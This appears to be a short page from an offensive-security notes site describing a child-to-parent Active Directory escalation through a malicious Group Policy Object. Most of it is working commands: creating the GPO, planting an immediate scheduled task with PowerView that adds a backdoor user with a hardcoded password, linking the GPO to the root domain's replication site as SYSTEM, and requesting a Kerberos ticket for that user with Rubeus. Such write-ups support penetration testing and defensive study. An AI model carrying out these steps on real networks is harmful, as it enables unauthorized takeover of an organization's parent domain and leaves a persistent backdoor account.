GPO On-Site Attack
Last updated
Last updated
This technique can be used to move from the child domain to the parent one. The steps are the following:
Create a malicious GPO on the Child DC.
Query the Root Domain to identify the replication site
of the Root Domain
.
Link the created
GPO to the Default Replication
Site of the Root DC as SYSTEM
Upon completion of replication, confirm the presence of the created GPO within the Root DC
.
We'll start by creating a GPO
$gpo = "Something"
New-GPO $gpo
With that set up we'll create a scheduled task inside that GPO that will add a new user
Import-Module .\PowerView_2.ps1
New-GPOImmediateTask -Verbose -Force -TaskName 'Something' -GPODisplayName "Something" -Command C:\Windows\System32\cmd.exe -CommandArguments "/c net user otter SomethingSecure123! /add"
We can verify if the task has been added as we also have to make sure to set the Run a new instance in parallel
option
After this, it's time to link the GPO to the Default Replication
Site of the Root DC: to this we first have to retrieve the site
Get-ADDomainController -Server domain.com | Select ServerObjectDN
and then link the GPO to it with a SYSTEM
shell
$sitePath = "CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=DOMAIN,DC=COM"
New-GPLink -Name "Something" -Target $sitePath -Server dev.domain.com
Now we can wait for the task to run and request a TGT for the backdoored user on the parent DC.
.\Rubeus.exe asktgt /user:otter /password:'SomethingSecure123!' /domain:domain.com /ptt